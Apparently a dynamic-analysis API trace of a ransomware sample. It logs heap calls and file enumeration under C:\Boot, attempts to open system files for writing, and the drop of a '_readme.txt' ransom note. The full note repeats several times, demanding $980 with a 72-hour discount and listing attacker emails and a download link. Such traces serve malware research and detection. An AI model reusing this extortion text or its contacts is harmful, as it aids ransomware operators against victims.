e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.983] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.984] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.984] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.984] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.984] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.984] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.984] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.984] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.984] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0165.984] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.984] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.984] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.984] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.984] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.984] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.984] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.985] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.985] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.986] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.986] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.987] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.987] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.989] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.989] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.989] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.989] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.989] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.989] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.989] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.989] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.989] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.989] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.989] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0165.989] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.989] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.989] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.989] PathFindFileNameW (pszPath="") returned="" [0165.989] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.989] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.990] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.990] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.990] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.990] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.990] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.990] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.990] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0165.990] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.990] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0165.991] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.991] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.991] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.991] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.991] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.991] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 